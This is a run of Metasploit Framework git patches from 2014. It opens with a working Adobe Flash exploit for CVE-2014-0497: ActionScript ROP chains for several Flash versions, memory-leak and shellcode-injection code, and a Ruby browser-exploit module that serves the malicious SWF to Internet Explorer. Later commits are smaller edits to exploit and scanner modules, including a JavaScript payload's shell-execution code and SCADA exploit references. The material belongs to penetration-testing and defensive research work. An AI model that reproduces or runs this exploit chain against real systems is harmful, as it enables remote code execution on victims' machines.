payload.writeUnsignedInt((vftableAddr_copy + 8192266)); + payload.writeUnsignedInt((vftableAddr_copy + 1578904)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,7,700,202": + vftableAddr_copy = (vftableAddr_copy - 0xc4f508); + _local_5 = (vftableAddr_copy + 0x101f000); + payload.position = 8; + payload.writeUnsignedInt((vftableAddr_copy + 0x7dfcd2)); // 107dfcd2 : add esp,44h ; ret + payload.position = 0x40; + payload.writeUnsignedInt((vftableAddr_copy + 0x12a269)); // 1012a269 : xchg edx,esp ; add eax,dword ptr [eax]; add byte ptr [edi+5Eh],bl ; pop ecx ; ret + payload.position = 0x50; + payload.writeUnsignedInt((vftableAddr_copy + 0xcb497)); // 100cb497 : pop eax ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0xb35388)); // 10b35388 : ptr to VirtualProtect + payload.writeUnsignedInt((vftableAddr_copy + 0x110d3d)); // 10110d3d : mov eax,dword ptr [eax] ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0x887362)); // 10887362 : push eax ; ret + payload.writeUnsignedInt((vftableAddr_copy + 0x331bff)); // 10331bff : jmp esp + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(0x40); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,8,800,97": + vftableAddr_copy = (vftableAddr_copy - 129165844); + _local_5 = (vftableAddr_copy + 16904192); + payload.position = 8; + payload.writeUnsignedInt(vftableAddr_copy); + payload.position = 16; + payload.writeUnsignedInt((vftableAddr_copy + 117625919)); + payload.writeUnsignedInt(-1810746282); + payload.writeUnsignedInt((scAddr + 76)); + payload.writeUnsignedInt((vftableAddr_copy + 122565891)); + payload.position = 44; + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 0x0400)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 123362382)); + payload.position = 80; + payload.writeUnsignedInt((scAddr + 192)); + payload.position = 112; + payload.writeUnsignedInt((vftableAddr_copy + 32365)); + payload.writeUnsignedInt((vftableAddr_copy + 11760520)); + payload.writeUnsignedInt((vftableAddr_copy + 1117213)); + payload.writeUnsignedInt((vftableAddr_copy + 3721232)); + payload.writeUnsignedInt((vftableAddr_copy + 8274178)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + case "win 11,8,800,50": + vftableAddr_copy = (vftableAddr_copy - 12936000); + _local_5 = (vftableAddr_copy + 17149952); + payload.writeUnsignedInt((vftableAddr_copy + 404531)); + payload.position = 64; + payload.writeUnsignedInt((vftableAddr_copy + 2583617)); + payload.position = 72; + payload.writeUnsignedInt((vftableAddr_copy + 7914140)); + payload.writeUnsignedInt((vftableAddr_copy + 4550)); + payload.writeUnsignedInt((vftableAddr_copy + 11780992)); + payload.writeUnsignedInt((vftableAddr_copy + 32684)); + payload.writeUnsignedInt((vftableAddr_copy + 142358)); + payload.writeUnsignedInt((vftableAddr_copy + 1577816)); + payload.writeUnsignedInt(scAddr); + payload.writeUnsignedInt(0x1000); + payload.writeUnsignedInt(64); + payload.writeUnsignedInt((scAddr - 4)); + break; + default: + return (null); + }; + return (payload); + } + + public function exploit():Boolean + { + var vector_objects_entry_length:int; + var shellcode_byte = null; + var _local_6:uint; + var i:int; + var vftable_addr:uint; + var shellcode_address:uint; + var vector_objects_entry_idx:uint; + var length_vector_byte_arrays:uint; + var vector_byte_arrays:Vector. = new Vector.(0); + var vector_objects:Vector. = new Vector.(0); + var twos_object:Object = new [2, 2, 2, 2, 2, 2, 2, 2]; + var vickers_byte_array:ByteArray = new ByteArray(); + while (i < 0x0500) + { + vector_byte_arrays[i] = new ByteArray(); + vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + i++; + }; + vickers_byte_array.writeUTFBytes("vickers"); + vickers_byte_array.length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + ApplicationDomain.currentDomain.domainMemory = vickers_byte_array; + vector_byte_arrays[i] = new ByteArray(); + vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH; + length_vector_byte_arrays = i; + i = 0; + while (i < (vector_byte_arrays.length - 1)) + { + vector_byte_arrays[i++] = null; + }; + i = 0; + while (i < 0x8000) + { + vector_objects[i] = new [i, twos_object, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]; + i++; + }; + // _local_6 => nil => 0, makes li32(_local_6 - offset) makes it underflow! + // Example leak: 0275ef00 => 10c4f508 0000003b 00002326 + if (((!((li16((_local_6 + 1)) == 114))) && (((vftable_addr = li32((_local_6 - 0x0100)) ) == 305419896)))) + { + }; + if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_idx = li32((_local_6 - 248)) ) == 305419896)))) + { + }; + vector_objects_entry_idx = (vector_objects_entry_idx >> 3); + if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_length = li32((_local_6 - 252)) ) == 305419896)))) + { + }; + + // No success + if (vector_objects_entry_length != vector_objects[vector_objects_entry_idx].length) + { + vickers_byte_array = null; + vector_byte_arrays[length_vector_byte_arrays] = null; + i = 0; + while (i < vector_objects.length) + { + vector_objects[i++] = null; + }; + return (false); + }; + + i = 0; + while (i < vector_objects.length) + { + if (i != vector_objects_entry_idx) + { + vector_objects[i] = null; + }; + i++; + }; + // Use underflow to leak shellcode address + if (((!((li16((_local_6 + 1)) == 114))) && (((shellcode_address = li32((_local_6 - 0x0200)) ) == 305419896)))) + { + }; + shellcode_address = (shellcode_address + 0x1300); + var rop_payload:ByteArray = makePayload(vftable_addr, shellcode_address); + if (rop_payload == null) + { + return (true); + }; + var j:uint; + var shellcode_length:uint = shellcode.length; + var shellcode_byte_array:ByteArray = new ByteArray(); + shellcode_byte_array.endian = "littleEndian"; + while (j < shellcode_length) + { + shellcode_byte = (shellcode.charAt(j) + shellcode.charAt((j + 1))); + shellcode_byte_array.writeByte(parseInt(shellcode_byte, 16)); + j = (j + 2); + }; + vector_byte_arrays[length_vector_byte_arrays].position = 0; + vector_byte_arrays[length_vector_byte_arrays].endian = "littleEndian"; + vector_byte_arrays[length_vector_byte_arrays].writeBytes(rop_payload); + vector_byte_arrays[length_vector_byte_arrays].writeBytes(shellcode_byte_array); + // Use underflow to overwrite and get code execution + if (li16((_local_6 + 1)) != 114) + { + si32((shellcode_address + 1), (_local_6 - 244)); + }; + vector_objects[vector_objects_entry_idx][1][0]; + return (true); + } + + + } +}//package diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb new file mode 100644 index 0000000000..afcf69616b --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -0,0 +1,132 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Integer Underflow Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player + before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an + integer underflow in several avm2 instructions, which can be turned into remote code + execution under the context of the user, as exploited in the wild in February 2014. This + module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP + SP3, Windows 7 SP1 and Windows 8 even when it includes rop chains for several Flash 11 + versions, as exploited in the wild. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + [ 'CVE', '2014-0497' ], + [ 'OSVDB', '102849' ], + [ 'BID', '65327' ], + [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ], + [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ], + [ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ] + ], + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false + }, + 'Platform' => 'win', + # Versions targeted in the wild: + # [*] Windows 8: + # 11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14 + # 11,6,602,167, 11,6,602,171 ,11,6,602,180 + # 11,7,700,169, 11,7,700,202, 11,7,700,224 + # [*] Before windows 8: + # 11,0,1,152, + # 11,1,102,55, 11,1,102,62, 11,1,102,63 + # 11,2,202,228, 11,2,202,233, 11,2,202,235 + # 11,3,300,257, 11,3,300,273 + # 11,4,402,278 + # 11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149 + # 11,6,602,168, 11,6,602,171, 11,6,602,180 + # 11,7,700,169, 11,7,700,202 + # 11,8,800,97, 11,8,800,50 + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Feb 5 2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + shellcode = get_payload(cli, target_info).unpack("H*")[0] + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 5b150a04c61e9a5e38d2118acb7ba5edbb90e76a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sat, 3 May 2014 20:08:00 -0500 Subject: [PATCH 241/853] Add testing information to description --- modules/exploits/windows/browser/adobe_flash_avm2.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb index afcf69616b..8f423e53e0 100644 --- a/modules/exploits/windows/browser/adobe_flash_avm2.rb +++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Remote integer underflow in several avm2 instructions, which can be turned into remote code execution under the context of the user, as exploited in the wild in February 2014. This module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP - SP3, Windows 7 SP1 and Windows 8 even when it includes rop chains for several Flash 11 - versions, as exploited in the wild. + SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes + rop chains for several Flash 11 versions, as exploited in the wild. }, 'License' => MSF_LICENSE, 'Author' => From dd7705055bd61747538af6b3c06da6951d55e85b Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Sun, 4 May 2014 19:31:53 +0200 Subject: [PATCH 242/853] Fix author --- modules/exploits/multi/http/sonicwall_gms_upload.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 0be872543b..63f0cf3715 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Nikolas Sotiriu', # Vulnerability Discovery - 'Julian Vilas ', # Metasploit module + 'Redsadic ', # Metasploit module 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, From cc8ab9bcba52a2c1e17ce17080a4453a0b8754ae Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 5 May 2014 18:57:15 +1000 Subject: [PATCH 243/853] Support one line js payload Add missing ';' in `run_cmd_source` --- lib/msf/core/payload/firefox.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index db762a3f54..bdd10154a7 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -92,7 +92,7 @@ module Msf::Payload::Firefox try { retVal = Function('send', js[1])(function(r){ if (sent) return; - sent = true + sent = true; if (r) { if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); }); else cb(false, r+tag+"\\n"); @@ -111,7 +111,7 @@ module Msf::Payload::Firefox } var shEsc = "\\\\$&"; - var shPath = "/bin/sh -c" + var shPath = "/bin/sh -c"; if (windows) { shPath = "cmd /c"; From 3072c2f08ad8658f278066853604a094f3c6c013 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:25:55 -0500 Subject: [PATCH 244/853] Update CVEs for RootedCon Yokogawa modules Noticed they were nicely documented at http://chemical-facility-security-news.blogspot.com/2014/03/ics-cert-publishes-yokogawa-advisory.html We apparently never updated with CVE numbers. --- modules/auxiliary/dos/scada/yokogawa_logsvr.rb | 3 ++- modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb | 3 ++- modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb | 3 ++- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb index 8f11b42279..1fef0d305a 100644 --- a/modules/auxiliary/dos/scada/yokogawa_logsvr.rb +++ b/modules/auxiliary/dos/scada/yokogawa_logsvr.rb @@ -29,7 +29,8 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0781'] ], 'DisclosureDate' => 'Mar 10 2014', )) diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 678dcb23e9..410eecec0d 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -26,7 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0784'] ], 'Payload' => { diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index fc5144ec3f..cc6166ad9d 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -28,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf' ], - [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ] + [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities' ], + [ 'CVE', '2014-0783'] ], 'Payload' => { From c6affcd6d3cbe0f74f7b99a1960774f6af62f663 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:38:53 -0500 Subject: [PATCH 245/853] Fix caps, description on F5 module The product name isn't "Load Balancer" as far as I can tell. --- modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index 838bc2803e..a949fa36c5 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -14,8 +14,8 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'F5 BigIP Backend Cookie Disclosure', 'Description' => %q{ - This module identify F5 BigIP Load Balancers and leaks backends - information through cookies. + This module identifies F5 BigIP load balancers and leaks backend + information through cookies inserted by the BigIP devices. }, 'Author' => [ 'Thanat0s ' ], 'References' => @@ -96,13 +96,13 @@ class Metasploit3 < Msf::Auxiliary cookie = get_cookie() # Get the cookie # If the cookie is not found, stop process if cookie.empty? || cookie[:id].nil? - print_error("#{peer} - F5 Server Load Balancing cookie not found") + print_error("#{peer} - F5 Server load balancing cookie not found") break end # Print the cookie name on the first request if i == 0 - print_status("#{peer} - F5 Server Load Balancing \"#{cookie[:id]}\" found") + print_status("#{peer} - F5 Server load balancing cookie \"#{cookie[:id]}\" found") end back_end = cookie_decode(cookie[:value]) From 3536ec9a742b3a579bd94fa64f676bd8b95c641a Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:43:44 -0500 Subject: [PATCH 246/853] Description update --- modules/exploits/multi/http/struts_code_exec_classloader.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index ee944aaeae..344061f9e5 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -17,9 +17,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts - versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows - access to 'class' parameter which is directly mapped to getClass() method and - allows ClassLoader manipulation, which allows remote attackers to execute arbitrary + versions < 2.3.16.2. This vulnerability is due to the ParametersInterceptor, which allows + access to 'class' parameter that is directly mapped to getClass() method and + allows ClassLoader manipulation. As a result, this can allow remote attackers to execute arbitrary Java code via crafted parameters. }, 'Author' => From c97c827140b5961843e35af23c4612a694301bd8 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 5 May 2014 13:46:19 -0500 Subject: [PATCH 247/853] Adjust desc and ranking on ms13-053 Since it's likely to crash winlogin.exe in the normal use case (eventually), I've kicked this down to Average ranking. --- modules/exploits/windows/local/ms13_053_schlamperei.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 48e9fa8da3..daab80e39a 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local - Rank = GreatRanking + Rank = AverageRanking include Msf::Post::File include Msf::Post::Windows::Priv @@ -20,11 +20,11 @@ class Metasploit3 < Msf::Exploit::Local super(update_info(info, { 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ - A kernel pool overflow in Win32k which allows local privilege escalation. + This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving - privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. - NOTE: when you exit the meterpreter session, winlogon.exe is likely to crash. + privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. + NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash. }, 'License' => MSF_LICENSE, 'Author' => From 57df34b54f559f5d7e6c62713a8407e400a2da99 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 5 May 2014 21:18:48 +0100 Subject: [PATCH 248/853] Fix some yarddoc issues --- lib/msf/core/modules/loader/directory.rb | 2 +- lib/rex/mime/part.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb | 2 +- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index aed29b7be2..a5712125ce 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -109,4 +109,4 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base module_content end -end \ No newline at end of file +end diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 40ddcdded7..ef80bb5ec5 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -36,8 +36,8 @@ class Part # Returns the Content-Transfer-Encoding of the part. # - # @returns [nil] if the part hasn't Content-Transfer-Encoding. - # @returns [String] The Content-Transfer-Encoding or the part. + # @return [nil] if the part hasn't Content-Transfer-Encoding. + # @return [String] The Content-Transfer-Encoding or the part. def transfer_encoding h = header.find('Content-Transfer-Encoding') return nil if h.nil? diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb index d7a7db2409..ad7731162d 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb @@ -32,7 +32,7 @@ class Adsi # @param fields [Array] Array of string fields to return for # each result found # - # @returns [Hash] Array of field names with associated results. + # @return [Hash] Array of field names with associated results. # def domain_query(domain_name, filter, max_results, page_size, fields) request = Packet.create_request('extapi_adsi_domain_query') diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index c6351318bd..fde12f624e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -26,7 +26,7 @@ class Wmi # @param root [String] Specify root to target, otherwise defaults # to 'root\cimv2' # - # @returns [Hash] Array of field names with associated values. + # @return [Hash] Array of field names with associated values. # def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') From 3542f851bf6e3f80c05ad6918fec585a2ac2b4b7 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Mon, 5 May 2014 21:18:48 +0100 Subject: [PATCH 249/853] Fix some yarddoc issues --- lib/msf/core/modules/loader/directory.rb | 2 +- lib/rex/mime/part.rb | 4 ++-- lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb | 2 +- lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb | 2 +- 4 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index aed29b7be2..a5712125ce 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -109,4 +109,4 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base module_content end -end \ No newline at end of file +end diff --git a/lib/rex/mime/part.rb b/lib/rex/mime/part.rb index 40ddcdded7..ef80bb5ec5 100644 --- a/lib/rex/mime/part.rb +++ b/lib/rex/mime/part.rb @@ -36,8 +36,8 @@ class Part # Returns the Content-Transfer-Encoding of the part. # - # @returns [nil] if the part hasn't Content-Transfer-Encoding. - # @returns [String] The Content-Transfer-Encoding or the part. + # @return [nil] if the part hasn't Content-Transfer-Encoding. + # @return [String] The Content-Transfer-Encoding or the part. def transfer_encoding h = header.find('Content-Transfer-Encoding') return nil if h.nil? diff --git a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb index d7a7db2409..ad7731162d 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/adsi/adsi.rb @@ -32,7 +32,7 @@ class Adsi # @param fields [Array] Array of string fields to return for # each result found # - # @returns [Hash] Array of field names with associated results. + # @return [Hash] Array of field names with associated results. # def domain_query(domain_name, filter, max_results, page_size, fields) request = Packet.create_request('extapi_adsi_domain_query') diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index c6351318bd..fde12f624e 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -26,7 +26,7 @@ class Wmi # @param root [String] Specify root to target, otherwise defaults # to 'root\cimv2' # - # @returns [Hash] Array of field names with associated values. + # @return [Hash] Array of field names with associated values. # def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') From 1f3466a3a3ef68cda5955067d60e82763923e4fe Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Mon, 5 May 2014 23:21:54 +0200 Subject: [PATCH 250/853] Added Modbus error handling. It now checks for error and displays the appropriate error message. The only error simulated was "ILLEGAL ADDRESS", don't know how to test for others. --- .../auxiliary/scanner/scada/modbusclient.rb | 38 +++++++++++++++++-- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index 43e7cd99a4..b6f83c835c 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -93,6 +93,24 @@ class Metasploit3 < Msf::Auxiliary packet_data end + def handle_error(response) + case response.reverse.unpack("c")[0].to_i + when 1 + print_error("Error : ILLEGAL FUNCTION") + when 2 + print_error("Error : ILLEGAL DATA ADDRESS") + when 3 + print_error("Error : ILLEGAL DATA VALUE") + when 4 + print_error("Error : SLAVE DEVICE FAILURE") + when 6 + print_error("Error : SLAVE DEVICE BUSY") + else + print_error("Unknown error") + end + return + end + def read_coil @function_code = 1 print_status("Sending READ COIL...") @@ -100,8 +118,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the READ COIL") return + elsif response.unpack("C*")[-2] == 129 + handle_error(response) + else + print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) end - print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) end def read_register @@ -111,9 +132,12 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the READ REGISTER") return - end + elsif response.unpack("C*")[-2] == 131 + handle_error(response) + else value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) + end end def write_coil @@ -131,8 +155,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the WRITE COIL") return + elsif response.unpack("C*")[-2] == 133 + handle_error(response) + else + print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") end - print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") end def write_register @@ -146,8 +173,11 @@ class Metasploit3 < Msf::Auxiliary if response.nil? print_error("No answer for the WRITE REGISTER") return + elsif response.unpack("C*")[-2] == 134 + handle_error(response) + else + print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") end - print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") end def run From a55e2bcf19e7e13a2cd57c49f4e7f5534dd881e9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 7 May 2014 09:38:59 -0500 Subject: [PATCH 251/853] Rework banner trailers in sprintf padding --- lib/msf/ui/console/command_dispatcher/core.rb | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8237fd1682..ca6427b7fe 100644 --- 